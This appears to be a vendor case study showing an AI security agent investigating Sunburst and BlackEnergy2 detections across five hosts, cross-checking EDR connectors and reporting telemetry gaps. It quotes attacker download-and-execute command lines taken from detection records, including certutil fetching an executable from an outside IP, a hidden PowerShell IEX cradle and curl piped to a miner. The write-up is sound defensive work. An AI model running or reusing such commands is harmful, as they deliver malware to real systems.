Sunburst on five hosts.
Only one EDR saw it.
Five hosts across Windows and Linux are flagged with APT-grade malware: Sunburst (SolarWinds-era supply-chain tooling) and BlackEnergy2 (Sandworm / APT44). Three weeks of recurring detections. Three other EDR connectors saw nothing. Two telemetry connectors, process_activity and file_activity, returned zero records on the affected hosts. The agent’s verdict: Critical. Its confidence: Medium. The gap between those two ratings is the case.
The agent didn’t take Zircon’s word for it. It queried three other EDR connectors and two telemetry connectors. The cross-source view is what makes “Critical with Medium confidence” defensible.
Zero records on file_activity is a finding, not a non-result. The agent surfaces it, sets confidence accordingly, and recommends connector remediation as part of the response.
Verdict and confidence are separate dimensions. The verdict is Critical because the evidence supports it. The confidence is Medium because the verification chain has a documented break. The human reads both.
25 detections. One vendor saw all of them.
Phase 1 intake against the detection_finding mesh returned 25 high-severity records across five hosts. The malware family names matched two distinct lineages: Sunburst, associated with the SolarWinds supply-chain compromise, and BlackEnergy2, attributed to Sandworm / APT44, a nation-state actor known for destructive intrusions.
Hash 31b50e5fbf4b123b6f32fc28edd0ba86 (Sunburst) appeared in six distinct persistence
locations spanning Windows Tasks, Windows Startup folders, Linux /usr/bin/, Linux
/etc/cron.hourly/, Windows Prefetch, and a user Desktop directory. All between
March 24 and April 12. One hash, one binary, redeployed or self-propagating across the cluster.
| Host | OS | User | Family | Path |
|---|---|---|---|---|
| LAP-812 | Windows | deborah.w*** | Sunburst | C:\Windows\Tasks\WinX.Sunburst.zip |
| WORKSTATION-272 | Windows | christopher.t*** | BlackEnergy2 | C:\Program Files (x86)\BlackEnergy2.zip |
| VIRTSRV-804 | Windows / VM | edward.b*** | Sunburst | Startup folder |
| suse-mlops-1126 | Linux / SUSE | peter.t*** | BlackEnergy2 + cryptominer | Webserver-served payload |
| ubuntu-appdev-1846 | Linux / Ubuntu | dawn.c*** | BlackEnergy2 | crontab persistence |
The delivery methods are textbook LOLBin: outlook.exe → powershell.exe → certutil -urlcache
on the laptop; excel.exe → cmd.exe → powershell.exe -nop -noni -w hidden -c IEX (DownloadString)
on the workstation; scrcons.exe → rundll32 javascript: on the VM; bash → curl
with cryptominer pipe on the SUSE host. Five different initial-access patterns, one campaign.
Three other EDR connectors had nothing.
Before promoting the verdict, the agent ran cross-source detection verification: same malware, same hosts, same 90-day window, queried across every other available EDR and detection connector.
ATB-MDE produced detections for Crilock and PSAttackTool on different hosts, all RESOLVED. Two other production EDRs, Carbonblack and CrowdStrike, produced zero HIGH+ findings in the same 90-day window. If Zircon misses a variant, no backup detection exists. Single-source detection is a process risk the agent surfaces explicitly.
Confidence in malware family attribution: High. Confidence in environmental scope: Medium. Zircon’s coverage map may not match Carbonblack’s or CrowdStrike’s. Other hosts may be infected and invisible to the EDR that’s looking.
Detection without execution evidence.
The detection record contains a command line: certutil.exe -urlcache -split -f http://192.0.2.45/svc01da4def.exe.
Convincing on its face. But the command line lives inside the detection event itself; it was
reported by Zircon’s parser, not corroborated by an independent process tree. Standard verification
requires pulling process_activity and file_activity for the affected
hosts and matching execution timestamps to detection timestamps.
The agent ran exactly that verification, and got nothing.
Zero file_activity records. Zero process_activity records. Across six telemetry connectors. Each query independently confirmed: the affected hosts either don’t forward EDR telemetry, or the connectors that should cover them don’t.
The agent’s confidence was set to Medium specifically because of this gap. The detection is real; the family attribution is supported by VirusTotal confirmation on the hashes; the execution chain cannot be independently verified. The report’s exact language: “Detection-only evidence; zero telemetry corroboration.”
Cross-source detection coverage is a hygiene metric.
One EDR seeing 25 detections while three others see zero is information. It does not invalidate the finding. Zircon’s verdict is well-supported by hash reputation. But it means the environmental scope claim is bounded by Zircon’s coverage map, which may not match what the rest of the stack sees.
Telemetry gaps are not silent.
file_activity and process_activity returning zero records is the loudest possible signal that something is wrong with the detection-to-telemetry coupling. The agent names the gap, sets confidence accordingly, and recommends investigating connector health before any cleanup action.
Confidence ≠ verdict.
Verdict: Malicious. Confidence: Medium. Both are stated. The verdict is supported by external hash reputation and consistent persistence patterns. The confidence is bounded by the inability to verify execution independently. Most autonomous tools collapse these into one number. Workers keeps them separate.
Standard tier budgets are a feature.
The investigation hit the 15-query budget at Standard tier. Rather than overrunning, it documented what was deferred (auth, network egress, full forensics) and recommended Deep tier upgrade with the specific queries that would extend coverage. Budget exhaustion is a decision point, not a failure.
Cross-source verification queries
Q1Phase 1 intake: HIGH+ detection across mesh25 DETECTIONS
Q3Carbonblack cross-check: same hosts, same window0 RECORDS
Q4CrowdStrike cross-check0 RECORDS
Q5file_activity telemetry pivot: does any source see execution?TELEMETRY GAP
Q6process_activity pivot: same five hostsTELEMETRY GAP
Q7Sunburst hash persistence across 3 weeks6 LOCATIONS
/usr/bin/, /etc/cron.hourly/, user Desktop. March 24 to April 12.Q14–Q15VirusTotal hash enrichmentEXTERNAL CONFIRM
Showing 7 of 15 queries (budget reached at Standard tier). Full audit trail in queries.md.
Sources queried · with status
| Source | Status | Notes |
|---|---|---|
| detection.zircon_v2 | HIT | 25 detections across 5 hosts. Sole detection source. |
| detection.carbonblack | EMPTY | 0 HIGH+ records, same 90d window. No corroboration. |
| detection.crowdstrike | EMPTY | 0 HIGH+ records, same 90d window. No corroboration. |
| detection.atb_mde (Defender) | DIFFERENT FAMILIES | Crilock + PSAttackTool, all RESOLVED. Different surface, different families. |
| file_activity (ATB-XDR, CBC, Kalibr) | GAP | 0 records across 6 telemetry connectors for the 5 affected hosts. |
| process_activity (ATB-XDR, CBC, Kalibr) | GAP | 0 records. Independent execution verification impossible. |
| osint.virustotal | HIT | Both campaign hashes confirmed Known Malicious externally. |
Gaps explicitly catalogued
- Single-source detection coverage: if Zircon misses a variant, no other EDR provides backup. This is a process risk, not a finding closure.
- Zero telemetry corroboration: file_activity + process_activity empty across all telemetry connectors for the 5 hosts. Execution timelines depend on Zircon’s parser.
- Cannot confirm remediation efficacy: if any cleanup actions were taken, no telemetry trail shows the outcome.
- Authentication for affected users not pulled. Budget-bound. Lateral movement and credential reuse from these 5 hosts is unverified.
- Network egress detail for C2 IPs deferred. Standard tier budget exhausted at 15 queries. Recommend Deep tier upgrade for full scope.
Cross-check your top alerts against every connector.
Bring an alert. See what every other source saw.